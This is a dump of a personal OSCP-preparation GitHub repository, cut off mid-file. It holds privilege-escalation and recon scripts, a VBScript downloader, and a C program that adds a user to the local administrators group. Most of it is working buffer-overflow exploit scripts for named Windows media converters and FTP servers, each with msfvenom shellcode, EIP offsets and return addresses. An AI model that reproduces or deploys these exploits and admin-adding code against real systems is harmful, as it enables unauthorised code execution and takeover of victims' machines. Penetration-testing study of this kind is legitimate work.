├── Documents ├── Bookmark List.pdf ├── Hunting bad characters with mona.pdf ├── Proxychains with Windows machine.pdf ├── Upgrading half shells to fully interactive TTYs.pdf └── SQL Injection Cheatsheet.md ├── Windows ├── useradd.c ├── wget.vbs └── WinPrivCheck.bat ├── BASH ├── CronJobChecker.sh ├── PortKnocker.sh ├── SUIDChecker.sh ├── Recon.sh └── LinuxPrivCheck.sh ├── README.md └── Exploits ├── ADTVPP_v1.x.py ├── CFTPS_v1.2.py ├── FCDTMP3C_v3.1.py ├── ERM2MP3C_v2.7.3.700.py ├── ATMC_v3.0.0.100.py ├── ATMC_v1.82.50.py ├── FFTPS_v1.0.py ├── SLMail_5.5.0.py ├── VulnServer.py ├── PCManFTP_2.0.7_USER.py ├── MS_v1.4.1.py ├── PCManFTP_2.0.7_GET.py ├── PCManFTP_2.0.7_PORT.py └── Brainpan_v1.0.py /Documents/Bookmark List.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Bookmark List.pdf -------------------------------------------------------------------------------- /Documents/Hunting bad characters with mona.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Hunting bad characters with mona.pdf -------------------------------------------------------------------------------- /Documents/Proxychains with Windows machine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Proxychains with Windows machine.pdf -------------------------------------------------------------------------------- /Documents/Upgrading half shells to fully interactive TTYs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Upgrading half shells to fully interactive TTYs.pdf -------------------------------------------------------------------------------- /Windows/useradd.c: -------------------------------------------------------------------------------- 1 | #include /* system, NULL, EXIT_FAILURE */ 2 | 3 | int main () 4 | { 5 | int i; 6 | i=system ("net user ihack4falafel /add && net localgroup administrators ihack4falfel /add"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /BASH/CronJobChecker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #---------------------------------------------------------------------------------# 3 | # Name = Cron Job Checker # 4 | # Author = @ihack4falafel # 5 | # Date = 12/16/2017 # 6 | # Reference = https://www.youtube.com/watch?v=K9DKULxSBK4 # 7 | # Usage = chmod +x CronJobChecker.sh && ./CronJobChecker.sh # 8 | #---------------------------------------------------------------------------------# 9 | 10 | IFS=$'\n' 11 | 12 | # Check list of running processes 13 | old_proc=$(ps -eo command) 14 | 15 | # Look for newly created processes 16 | while true; do 17 | new_proc=$(ps -eo command) 18 | diff <(echo "$old_proc") <(echo "$new_proc") | grep [\<\>] 19 | sleep 1 20 | old_proc=$new_proc 21 | done 22 | 23 | -------------------------------------------------------------------------------- /Windows/wget.vbs: -------------------------------------------------------------------------------- 1 | strUrl = WScript.Arguments.Item(0) 2 | StrFile = WScript.Arguments.Item(1) 3 | Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 4 | Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 5 | Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 6 | Const HTTPREQUEST_PROXYSETTING_PROXY = 2 7 | Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts 8 | Err.Clear 9 | Set http = Nothing 10 | Set http = CreateObject("WinHttp.WinHttpRequest.5.1") 11 | If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") 12 | If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") 13 | If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") 14 | http.Open "GET", strURL, False 15 | http.Send 16 | varByteArray = http.ResponseBody 17 | Set http = Nothing 18 | Set fs = CreateObject("Scripting.FileSystemObject") 19 | Set ts = fs.CreateTextFile(StrFile, True) 20 | strData = "" 21 | strBuffer = "" 22 | For lngCounter = 0 to UBound(varByteArray) 23 | ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) 24 | Next 25 | ts.Close 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP 2 | 3 | Hello world! This repo contain some of the scripts, exploits, and documents made during my OSCP journey. The list include but not limited to the following: 4 | 5 | ### LinuxPrivCheck.sh 6 | Yes, there are far better scripts out there, However this one has less output to go thru and it has colors. Think basic nmap scan to look for low hanging fruit followed by more complete scan. 7 | 8 | ### PortKnocker.sh 9 | Basic port knocking script with cool colors 10 | 11 | ### CronJobChecker.sh 12 | Cron job checker script that may reveal root cron jobs by checking for newly spawned processes! kudos to IppSec 13 | 14 | ### WinPrivCheck.bat 15 | Comprehensive Windows privesc script that checks KBs as well as common misconfigurations 16 | 17 | ### SQL Injection Cheatsheet 18 | No SQLMap. No problem. This cheatsheet will walk you thru how to automate things like blind SQL injection with wfuzz 19 | 20 | 21 | ------------------------------------------------------------------------------------------------------------- 22 | 23 | I'm always open to suggestions, please let me know if there is anything I can add or improve! 24 | -------------------------------------------------------------------------------- /BASH/PortKnocker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #---------------------------------------------------------------------------------# 3 | # Name = Port Knocking Script # 4 | # Author = @ihack4falafel # 5 | # Date = 9/15/2017 # 6 | # Usage = chmod +x PortKnokcer.sh && ./PortKnocker.sh # 7 | #---------------------------------------------------------------------------------# 8 | 9 | # Check user input 10 | 11 | if ([ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ] || [ -z "$4" ]); then 12 | echo -e "\e[33m[*] Usage : \e[35m$0 \e[33m" 13 | echo -e "\e[33m[*] Example: \e[35m$0 1 2 3 192.168.199.150 \e[33m" 14 | exit 1 15 | fi 16 | 17 | # Check nmap 18 | 19 | if [ ! type nmap &> /dev/null ]; then 20 | echo "\e[31m[-]\e[34m Please install nmap and rerun the script.\e[39m" 21 | exit 0 22 | fi 23 | 24 | # Perform port knocking 25 | 26 | echo -e "\e[32m[+]\e[34m Knocking the following ports $1 $2 $3 ...\e[39m" 27 | sleep 3 28 | 29 | for port in $1 $2 $3; do nmap --host_timeout 100 --max-retries 0 -PN $4 3 -p $port; done > /dev/null 2>&1 30 | 31 | echo -e "\e[32m[+]\e[34m Checking for new open ports with nmap ...\e[39m" 32 | sleep 3 33 | 34 | nmap -sT -p- -r -n $4 --open | grep open 35 | 36 | 37 | -------------------------------------------------------------------------------- /BASH/SUIDChecker.sh: -------------------------------------------------------------------------------- 1 | echo "#------------------------------------------------#" 2 | echo "# SUID Files Enumeration Script #" 3 | echo "#------------------------------------------------#" 4 | echo " " 5 | 6 | #Find SUID files and store them in SUID_FILES.txt 7 | echo "[+] Dumping SUID files list into SUID_FILES.txt.." 8 | find / $ -perm -4000 $ -exec ls -ld {} \; 2>/dev/null | awk '{print $9}' > SUID_FILES.txt 9 | sleep 2 10 | 11 | #loop through common linux binaries and then remove them from SUID_FILES.txt 12 | echo "[+] Trimming common SUID files from SUID_FILES.txt..." 13 | 14 | for bname in '/umount/d' '/su/d' '/mount/d' '/sudo/d' '/passwd/d' '/exim4/d' '/chfn/d' '/chsh/d' '/procmail/d' '/newgrp/d' '/ping/d' '/ntfs-3g/d' '/pppd/d' '/pkexec/d' '/ssh-keysign/d' '/dbus-daemon-launch-helper/d' '/uuidd/d' '/pt_chown/d' '/at/d' '/mtr/d' '/dmcrypt-get-device/d' '/X/d' '/traceroute6.iputils/d' '/polkit-resolve-exe-helper/d' '/polkit-set-default-helper/d' '/polkit-grant-helper-pam/d' 15 | 16 | do 17 | sed -i $bname ./SUID_FILES.txt 18 | done 19 | sleep 2 20 | 21 | echo "[+] Preform strings on the following binaries.." 22 | echo " " 23 | echo "#------------------------------------------------#" 24 | for line in $(cat SUID_FILES.txt); do 25 | echo " * "$line 26 | done 27 | echo "#------------------------------------------------#" 28 | echo " " 29 | sleep 5 30 | 31 | # Perform string command on uncommon SUID binaries 32 | for line in $(cat SUID_FILES.txt); do 33 | echo " " 34 | echo "#------------------------------------------------#" 35 | echo $line 36 | echo "#------------------------------------------------#" 37 | strings $line 38 | echo " " 39 | sleep 5 40 | done 41 | echo " " 42 | echo "#------------------------------------------------#" 43 | echo "# Done. Happy hunting! #" 44 | echo "#------------------------------------------------#" 45 | 46 | 47 | -------------------------------------------------------------------------------- /Exploits/ADTVPP_v1.x.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-----------------------------------------------------------------------------------# 3 | # Software = Aviosoft Digital TV Player Professional 1.x # 4 | # Download Link = http://www.aviosoft.com/download.html # 5 | # Date = 8/19/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/22932/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional | Windows 7 SP1 - Enterprise # 9 | # EIP Offset = 260 # 10 | # Badchars = "\x00\x0A\x1A" # 11 | # RET Address = 0x6034c153 | "\xFF\xE4" | [Configuration.dll] # 12 | # Usage = Aviosoft DVT Player PRO > Open > Open Playlist > Evil_Payload.PLF # 13 | #-----------------------------------------------------------------------------------# 14 | 15 | import struct 16 | 17 | print "Creating evil file.." 18 | f=open("Evil_Payload.PLF","w") 19 | 20 | #----------------------------# 21 | # Buffer Structure # 22 | #----------------------------# 23 | # buffer = AAA...........AAA # 24 | # buffer = EIP - RET Address # 25 | # buffer = NOPSled # 26 | # buffer = payload # 27 | # buffer = BBB...........BBB # 28 | #----------------------------# 29 | 30 | #------------------------------------------------------------------------------# 31 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x1A" -f python -v payload # 32 | #------------------------------------------------------------------------------# 33 | 34 | payload = "" 35 | payload += "\xba\x2f\xeb\xc8\xf0\xd9\xd0\xd9\x74\x24\xf4\x58" 36 | payload += "\x31\xc9\xb1\x31\x31\x50\x13\x03\x50\x13\x83\xe8" 37 | payload += "\xd3\x09\x3d\x0c\xc3\x4c\xbe\xed\x13\x31\x36\x08" 38 | payload += "\x22\x71\x2c\x58\x14\x41\x26\x0c\x98\x2a\x6a\xa5" 39 | payload += "\x2b\x5e\xa3\xca\x9c\xd5\x95\xe5\x1d\x45\xe5\x64" 40 | payload += "\x9d\x94\x3a\x47\x9c\x56\x4f\x86\xd9\x8b\xa2\xda" 41 | payload += "\xb2\xc0\x11\xcb\xb7\x9d\xa9\x60\x8b\x30\xaa\x95" 42 | payload += "\x5b\x32\x9b\x0b\xd0\x6d\x3b\xad\x35\x06\x72\xb5" 43 | payload += "\x5a\x23\xcc\x4e\xa8\xdf\xcf\x86\xe1\x20\x63\xe7" 44 | payload += "\xce\xd2\x7d\x2f\xe8\x0c\x08\x59\x0b\xb0\x0b\x9e" 45 | payload += "\x76\x6e\x99\x05\xd0\xe5\x39\xe2\xe1\x2a\xdf\x61" 46 | payload += "\xed\x87\xab\x2e\xf1\x16\x7f\x45\x0d\x92\x7e\x8a" 47 | payload += "\x84\xe0\xa4\x0e\xcd\xb3\xc5\x17\xab\x12\xf9\x48" 48 | payload += "\x14\xca\x5f\x02\xb8\x1f\xd2\x49\xd6\xde\x60\xf4" 49 | payload += "\x94\xe1\x7a\xf7\x88\x89\x4b\x7c\x47\xcd\x53\x57" 50 | payload += "\x2c\x21\x1e\xfa\x04\xaa\xc7\x6e\x15\xb7\xf7\x44" 51 | payload += "\x59\xce\x7b\x6d\x21\x35\x63\x04\x24\x71\x23\xf4" 52 | payload += "\x54\xea\xc6\xfa\xcb\x0b\xc3\x98\x8a\x9f\x8f\x70" 53 | payload += "\x29\x18\x35\x8d" 54 | 55 | buffer = "A" * 260 56 | buffer += struct.pack(' New> Logging Options> More # 14 | #---------------------------------------------------------------------------------------------# 15 | 16 | import struct 17 | import time 18 | 19 | f=open("Evil_Payload.txt","w") 20 | 21 | #------------------------------------------------------------------------------# 22 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x0D" -f python -v payload # 23 | #------------------------------------------------------------------------------# 24 | 25 | payload = "" 26 | payload += "\xbb\x3e\x37\x28\xc3\xdb\xd6\xd9\x74\x24\xf4\x5a" 27 | payload += "\x31\xc9\xb1\x31\x83\xea\xfc\x31\x5a\x0f\x03\x5a" 28 | payload += "\x31\xd5\xdd\x3f\xa5\x9b\x1e\xc0\x35\xfc\x97\x25" 29 | payload += "\x04\x3c\xc3\x2e\x36\x8c\x87\x63\xba\x67\xc5\x97" 30 | payload += "\x49\x05\xc2\x98\xfa\xa0\x34\x96\xfb\x99\x05\xb9" 31 | payload += "\x7f\xe0\x59\x19\xbe\x2b\xac\x58\x87\x56\x5d\x08" 32 | payload += "\x50\x1c\xf0\xbd\xd5\x68\xc9\x36\xa5\x7d\x49\xaa" 33 | payload += "\x7d\x7f\x78\x7d\xf6\x26\x5a\x7f\xdb\x52\xd3\x67" 34 | payload += "\x38\x5e\xad\x1c\x8a\x14\x2c\xf5\xc3\xd5\x83\x38" 35 | payload += "\xec\x27\xdd\x7d\xca\xd7\xa8\x77\x29\x65\xab\x43" 36 | payload += "\x50\xb1\x3e\x50\xf2\x32\x98\xbc\x03\x96\x7f\x36" 37 | payload += "\x0f\x53\x0b\x10\x13\x62\xd8\x2a\x2f\xef\xdf\xfc" 38 | payload += "\xa6\xab\xfb\xd8\xe3\x68\x65\x78\x49\xde\x9a\x9a" 39 | payload += "\x32\xbf\x3e\xd0\xde\xd4\x32\xbb\xb4\x2b\xc0\xc1" 40 | payload += "\xfa\x2c\xda\xc9\xaa\x44\xeb\x42\x25\x12\xf4\x80" 41 | payload += "\x02\xec\xbe\x89\x22\x65\x67\x58\x77\xe8\x98\xb6" 42 | payload += "\xbb\x15\x1b\x33\x43\xe2\x03\x36\x46\xae\x83\xaa" 43 | payload += "\x3a\xbf\x61\xcd\xe9\xc0\xa3\xae\x6c\x53\x2f\x1f" 44 | payload += "\x0b\xd3\xca\x5f" 45 | 46 | #----------------------------# 47 | # Buffer Structure # 48 | #----------------------------# 49 | # buffer = AAA...........AAA # 50 | # buffer = EIP - RET Address # 51 | # buffer = NOPSled # 52 | # buffer = payload # 53 | # buffer = BBB...........BBB # 54 | #----------------------------# 55 | 56 | buffer = "A" * 312 57 | buffer += struct.pack(' WAV to WAV... > evil.wav # 13 | #-----------------------------------------------------------------------------------------------------------# 14 | 15 | import struct 16 | import time 17 | 18 | #--------------------------------------------------------------------------# 19 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A" -f python -v payload # 20 | #--------------------------------------------------------------------------# 21 | 22 | payload = "" 23 | payload += "\xbd\xf7\x87\xa8\x10\xda\xdd\xd9\x74\x24\xf4\x58" 24 | payload += "\x2b\xc9\xb1\x31\x31\x68\x13\x03\x68\x13\x83\xe8" 25 | payload += "\x0b\x65\x5d\xec\x1b\xe8\x9e\x0d\xdb\x8d\x17\xe8" 26 | payload += "\xea\x8d\x4c\x78\x5c\x3e\x06\x2c\x50\xb5\x4a\xc5" 27 | payload += "\xe3\xbb\x42\xea\x44\x71\xb5\xc5\x55\x2a\x85\x44" 28 | payload += "\xd5\x31\xda\xa6\xe4\xf9\x2f\xa6\x21\xe7\xc2\xfa" 29 | payload += "\xfa\x63\x70\xeb\x8f\x3e\x49\x80\xc3\xaf\xc9\x75" 30 | payload += "\x93\xce\xf8\x2b\xa8\x88\xda\xca\x7d\xa1\x52\xd5" 31 | payload += "\x62\x8c\x2d\x6e\x50\x7a\xac\xa6\xa9\x83\x03\x87" 32 | payload += "\x06\x76\x5d\xcf\xa0\x69\x28\x39\xd3\x14\x2b\xfe" 33 | payload += "\xae\xc2\xbe\xe5\x08\x80\x19\xc2\xa9\x45\xff\x81" 34 | payload += "\xa5\x22\x8b\xce\xa9\xb5\x58\x65\xd5\x3e\x5f\xaa" 35 | payload += "\x5c\x04\x44\x6e\x05\xde\xe5\x37\xe3\xb1\x1a\x27" 36 | payload += "\x4c\x6d\xbf\x23\x60\x7a\xb2\x69\xee\x7d\x40\x14" 37 | payload += "\x5c\x7d\x5a\x17\xf0\x16\x6b\x9c\x9f\x61\x74\x77" 38 | payload += "\xe4\x9e\x3e\xda\x4c\x37\xe7\x8e\xcd\x5a\x18\x65" 39 | payload += "\x11\x63\x9b\x8c\xe9\x90\x83\xe4\xec\xdd\x03\x14" 40 | payload += "\x9c\x4e\xe6\x1a\x33\x6e\x23\x79\xd2\xfc\xaf\x50" 41 | payload += "\x71\x85\x4a\xad" 42 | 43 | #----------------------------# 44 | # Buffer Structure # 45 | #----------------------------# 46 | # buffer = AAA...........AAA # 47 | # buffer = EIP - RET Address # 48 | # buffer = NOPSled # 49 | # buffer = payload # 50 | # buffer = BBB...........BBB # 51 | #----------------------------# 52 | 53 | buffer = "A" * 4112 54 | buffer += struct.pack(' Load > Evil_File.m3u # 13 | #-----------------------------------------------------------------------------------------------------------# 14 | 15 | import struct 16 | import time 17 | import socket 18 | 19 | #------------------------------------------------------------------------------# 20 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload # 21 | #------------------------------------------------------------------------------# 22 | 23 | payload = "" 24 | payload += "\xdd\xc6\xd9\x74\x24\xf4\x5b\xbf\xd5\xc2\x64\xc2" 25 | payload += "\x2b\xc9\xb1\x31\x83\xeb\xfc\x31\x7b\x14\x03\x7b" 26 | payload += "\xc1\x20\x91\x3e\x01\x26\x5a\xbf\xd1\x47\xd2\x5a" 27 | payload += "\xe0\x47\x80\x2f\x52\x78\xc2\x62\x5e\xf3\x86\x96" 28 | payload += "\xd5\x71\x0f\x98\x5e\x3f\x69\x97\x5f\x6c\x49\xb6" 29 | payload += "\xe3\x6f\x9e\x18\xda\xbf\xd3\x59\x1b\xdd\x1e\x0b" 30 | payload += "\xf4\xa9\x8d\xbc\x71\xe7\x0d\x36\xc9\xe9\x15\xab" 31 | payload += "\x99\x08\x37\x7a\x92\x52\x97\x7c\x77\xef\x9e\x66" 32 | payload += "\x94\xca\x69\x1c\x6e\xa0\x6b\xf4\xbf\x49\xc7\x39" 33 | payload += "\x70\xb8\x19\x7d\xb6\x23\x6c\x77\xc5\xde\x77\x4c" 34 | payload += "\xb4\x04\xfd\x57\x1e\xce\xa5\xb3\x9f\x03\x33\x37" 35 | payload += "\x93\xe8\x37\x1f\xb7\xef\x94\x2b\xc3\x64\x1b\xfc" 36 | payload += "\x42\x3e\x38\xd8\x0f\xe4\x21\x79\xf5\x4b\x5d\x99" 37 | payload += "\x56\x33\xfb\xd1\x7a\x20\x76\xb8\x10\xb7\x04\xc6" 38 | payload += "\x56\xb7\x16\xc9\xc6\xd0\x27\x42\x89\xa7\xb7\x81" 39 | payload += "\xee\x58\xf2\x88\x46\xf1\x5b\x59\xdb\x9c\x5b\xb7" 40 | payload += "\x1f\x99\xdf\x32\xdf\x5e\xff\x36\xda\x1b\x47\xaa" 41 | payload += "\x96\x34\x22\xcc\x05\x34\x67\xaf\xc8\xa6\xeb\x1e" 42 | payload += "\x6f\x4f\x89\x5e" 43 | 44 | #----------------------------# 45 | # Buffer Structure # 46 | #----------------------------# 47 | # buffer = AAA...........AAA # 48 | # buffer = EIP - RET Address # 49 | # buffer = NOPSled # 50 | # buffer = payload # 51 | # buffer = BBB...........BBB # 52 | #----------------------------# 53 | 54 | buffer = "A" * 26064 55 | buffer += struct.pack(' # 7 | #---------------------------------------------------------------------------------# 8 | 9 | 10 | 11 | # check for IP argument 12 | 13 | if [ -z "$1" ]; then 14 | echo -e "\e[35m[*] Usage: \e[36m$0 " 15 | echo -e "\e[39m" 16 | exit 1 17 | fi 18 | 19 | # check if packages are installed 20 | 21 | if [ ! type nmap &> /dev/null ]; then 22 | echo " " 23 | echo "Please install nmap and rerun the script." 24 | echo " " 25 | exit 0 26 | fi 27 | 28 | if [ ! type nikto &> /dev/null ]; then 29 | echo " " 30 | echo "Please install nikto and rerun the script." 31 | echo " " 32 | exit 0 33 | fi 34 | 35 | if [ ! type dirb &> /dev/null ]; then 36 | echo " " 37 | echo "Please install dirb and rerun the script." 38 | echo " " 39 | exit 0 40 | fi 41 | 42 | if [ ! locate enum4linux &> /dev/null ]; then 43 | echo " " 44 | echo "Please install enum4linux and rerun the script." 45 | echo " " 46 | exit 0 47 | fi 48 | 49 | # go ahead and start scanning 50 | 51 | echo " " 52 | echo -e "\e[35m#----------------------------------#" 53 | echo -e "\e[35m# \e[36m TCP Scan \e[35m #" 54 | echo -e "\e[35m#----------------------------------#" 55 | echo " " 56 | echo -e "\e[39m" 57 | 58 | nmap -Pn -p- -A $1 -r -n --open 59 | 60 | echo " " 61 | echo -e "\e[35m#----------------------------------#" 62 | echo -e "\e[35m# \e[36m Nikto Scan \e[35m #" 63 | echo -e "\e[35m#----------------------------------#" 64 | echo " " 65 | echo -e "\e[39m" 66 | 67 | nikto -h http://$1/ 68 | 69 | echo " " 70 | 71 | nikto -h https://$1/ 72 | 73 | echo " " 74 | echo -e "\e[35m#----------------------------------#" 75 | echo -e "\e[35m# \e[36m Dirb Scan \e[35m #" 76 | echo -e "\e[35m#----------------------------------#" 77 | echo " " 78 | echo -e "\e[39m" 79 | 80 | dirb http://$1/ /usr/share/wordlists/dirb/big.txt 81 | 82 | echo " " 83 | 84 | dirb https://$1/ /usr/share/wordlists/dirb/big.txt 85 | 86 | echo " " 87 | echo -e "\e[35m#----------------------------------#" 88 | echo -e "\e[35m# \e[36m Enum4linux \e[35m #" 89 | echo -e "\e[35m#----------------------------------#" 90 | echo " " 91 | echo -e "\e[39m" 92 | 93 | enum4linux $1 94 | 95 | echo " " 96 | echo -e "\e[35m#----------------------------------#" 97 | echo -e "\e[35m# \e[36m Happy Hunting! \e[35m #" 98 | echo -e "\e[35m#----------------------------------#" 99 | echo " " 100 | echo -e "\e[39m" 101 | 102 | -------------------------------------------------------------------------------- /Exploits/ATMC_v3.0.0.100.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-------------------------------------------------------------------------------------------------------------# 3 | # Software = ASX to MP3 Converter Version 3.0.0.100 # 4 | # Download Link = https://www.exploit-db.com/apps/b31a84e79d9941d89336b6708ef52a20-ASXtoMP3Converter_3121.exe # 5 | # Date = 10/11/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/11930/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # Windows 7 SP1 - Enterprise # 10 | # Windows 8.1 - Enterprise # 11 | # Windows 10 (64-bit) - Enterprise # # 12 | # EIP Offset = 17417 # 13 | # Badchars = "\x00\x09\x0a" # 14 | # RET Address = 0x1005dacf | "\xFF\xE4" | [MSA2Mfilter03.dll] # 15 | # Usage = ASX to MP3 Converter > load > Evil_Payload.asx # 16 | #-------------------------------------------------------------------------------------------------------------# 17 | 18 | import struct 19 | import time 20 | 21 | #------------------------------------------------------------------------------# 22 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a" -f python -v payload # 23 | #------------------------------------------------------------------------------# 24 | 25 | payload = "" 26 | payload += "\xdb\xdf\xd9\x74\x24\xf4\x5b\xbd\x9e\x16\x2c\x45" 27 | payload += "\x33\xc9\xb1\x31\x31\x6b\x18\x03\x6b\x18\x83\xc3" 28 | payload += "\x9a\xf4\xd9\xb9\x4a\x7a\x21\x42\x8a\x1b\xab\xa7" 29 | payload += "\xbb\x1b\xcf\xac\xeb\xab\x9b\xe1\x07\x47\xc9\x11" 30 | payload += "\x9c\x25\xc6\x16\x15\x83\x30\x18\xa6\xb8\x01\x3b" 31 | payload += "\x24\xc3\x55\x9b\x15\x0c\xa8\xda\x52\x71\x41\x8e" 32 | payload += "\x0b\xfd\xf4\x3f\x38\x4b\xc5\xb4\x72\x5d\x4d\x28" 33 | payload += "\xc2\x5c\x7c\xff\x59\x07\x5e\x01\x8e\x33\xd7\x19" 34 | payload += "\xd3\x7e\xa1\x92\x27\xf4\x30\x73\x76\xf5\x9f\xba" 35 | payload += "\xb7\x04\xe1\xfb\x7f\xf7\x94\xf5\x7c\x8a\xae\xc1" 36 | payload += "\xff\x50\x3a\xd2\xa7\x13\x9c\x3e\x56\xf7\x7b\xb4" 37 | payload += "\x54\xbc\x08\x92\x78\x43\xdc\xa8\x84\xc8\xe3\x7e" 38 | payload += "\x0d\x8a\xc7\x5a\x56\x48\x69\xfa\x32\x3f\x96\x1c" 39 | payload += "\x9d\xe0\x32\x56\x33\xf4\x4e\x35\x59\x0b\xdc\x43" 40 | payload += "\x2f\x0b\xde\x4b\x1f\x64\xef\xc0\xf0\xf3\xf0\x02" 41 | payload += "\xb5\x0c\xbb\x0f\x9f\x84\x62\xda\xa2\xc8\x94\x30" 42 | payload += "\xe0\xf4\x16\xb1\x98\x02\x06\xb0\x9d\x4f\x80\x28" 43 | payload += "\xef\xc0\x65\x4f\x5c\xe0\xaf\x2c\x03\x72\x33\x9d" 44 | payload += "\xa6\xf2\xd6\xe1" 45 | 46 | #----------------------------# 47 | # Buffer Structure # 48 | #----------------------------# 49 | # buffer = "http://" # 50 | # buffer = AAA...........AAA # 51 | # buffer = EIP - RET Address # 52 | # buffer = NOPSled # 53 | # buffer = payload # 54 | # buffer = BBB...........BBB # 55 | #----------------------------# 56 | 57 | buffer = "http://" 58 | buffer += "A" * 17417 59 | buffer += struct.pack(' load > Evil_Payload.asx # 13 | #---------------------------------------------------------------------------------------------------------# 14 | 15 | import struct 16 | import time 17 | import sys 18 | 19 | #----------------------------------------------------------------------------------# 20 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f python -v payload # 21 | #----------------------------------------------------------------------------------# 22 | 23 | payload = "" 24 | payload += "\xdb\xdb\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x31\xbd" 25 | payload += "\xb0\x10\x19\xb2\x31\x6a\x18\x83\xea\xfc\x03\x6a" 26 | payload += "\xa4\xf2\xec\x4e\x2c\x70\x0e\xaf\xac\x15\x86\x4a" 27 | payload += "\x9d\x15\xfc\x1f\x8d\xa5\x76\x4d\x21\x4d\xda\x66" 28 | payload += "\xb2\x23\xf3\x89\x73\x89\x25\xa7\x84\xa2\x16\xa6" 29 | payload += "\x06\xb9\x4a\x08\x37\x72\x9f\x49\x70\x6f\x52\x1b" 30 | payload += "\x29\xfb\xc1\x8c\x5e\xb1\xd9\x27\x2c\x57\x5a\xdb" 31 | payload += "\xe4\x56\x4b\x4a\x7f\x01\x4b\x6c\xac\x39\xc2\x76" 32 | payload += "\xb1\x04\x9c\x0d\x01\xf2\x1f\xc4\x58\xfb\x8c\x29" 33 | payload += "\x55\x0e\xcc\x6e\x51\xf1\xbb\x86\xa2\x8c\xbb\x5c" 34 | payload += "\xd9\x4a\x49\x47\x79\x18\xe9\xa3\x78\xcd\x6c\x27" 35 | payload += "\x76\xba\xfb\x6f\x9a\x3d\x2f\x04\xa6\xb6\xce\xcb" 36 | payload += "\x2f\x8c\xf4\xcf\x74\x56\x94\x56\xd0\x39\xa9\x89" 37 | payload += "\xbb\xe6\x0f\xc1\x51\xf2\x3d\x88\x3f\x05\xb3\xb6" 38 | payload += "\x0d\x05\xcb\xb8\x21\x6e\xfa\x33\xae\xe9\x03\x96" 39 | payload += "\x8b\x06\x4e\xbb\xbd\x8e\x17\x29\xfc\xd2\xa7\x87" 40 | payload += "\xc2\xea\x2b\x22\xba\x08\x33\x47\xbf\x55\xf3\xbb" 41 | payload += "\xcd\xc6\x96\xbb\x62\xe6\xb2\xdf\xe5\x74\x5e\x0e" 42 | payload += "\x80\xfc\xc5\x4e" 43 | 44 | #----------------------------# 45 | # Buffer Structure # 46 | #----------------------------# 47 | # buffer = AAA...........AAA # 48 | # buffer = EIP - RET Address # 49 | # buffer = NOPSled # 50 | # buffer = payload # 51 | # buffer = BBB...........BBB # 52 | #----------------------------# 53 | 54 | buffer = "A" * 233 55 | buffer += struct.pack(' # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | #---------------------------------------------------------------------------------------------# 16 | # List of Vuln. Commands = [DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT] # 17 | #---------------------------------------------------------------------------------------------# 18 | 19 | import sys 20 | import socket 21 | import struct 22 | import time 23 | 24 | 25 | if len(sys.argv) < 2: 26 | print "Usage : python exploit.py " 27 | print "Example : python exploit.py 127.0.0.1" 28 | sys.exit(0) 29 | 30 | HOST = sys.argv[1] 31 | 32 | #------------------------------------------------------------------------------# 33 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x0D" -f python -v payload # 34 | #------------------------------------------------------------------------------# 35 | 36 | payload = "" 37 | payload += "\xbd\x71\xa7\xd9\x36\xdd\xc7\xd9\x74\x24\xf4\x5a" 38 | payload += "\x31\xc9\xb1\x31\x31\x6a\x13\x83\xc2\x04\x03\x6a" 39 | payload += "\x7e\x45\x2c\xca\x68\x0b\xcf\x33\x68\x6c\x59\xd6" 40 | payload += "\x59\xac\x3d\x92\xc9\x1c\x35\xf6\xe5\xd7\x1b\xe3" 41 | payload += "\x7e\x95\xb3\x04\x37\x10\xe2\x2b\xc8\x09\xd6\x2a" 42 | payload += "\x4a\x50\x0b\x8d\x73\x9b\x5e\xcc\xb4\xc6\x93\x9c" 43 | payload += "\x6d\x8c\x06\x31\x1a\xd8\x9a\xba\x50\xcc\x9a\x5f" 44 | payload += "\x20\xef\x8b\xf1\x3b\xb6\x0b\xf3\xe8\xc2\x05\xeb" 45 | payload += "\xed\xef\xdc\x80\xc5\x84\xde\x40\x14\x64\x4c\xad" 46 | payload += "\x99\x97\x8c\xe9\x1d\x48\xfb\x03\x5e\xf5\xfc\xd7" 47 | payload += "\x1d\x21\x88\xc3\x85\xa2\x2a\x28\x34\x66\xac\xbb" 48 | payload += "\x3a\xc3\xba\xe4\x5e\xd2\x6f\x9f\x5a\x5f\x8e\x70" 49 | payload += "\xeb\x1b\xb5\x54\xb0\xf8\xd4\xcd\x1c\xae\xe9\x0e" 50 | payload 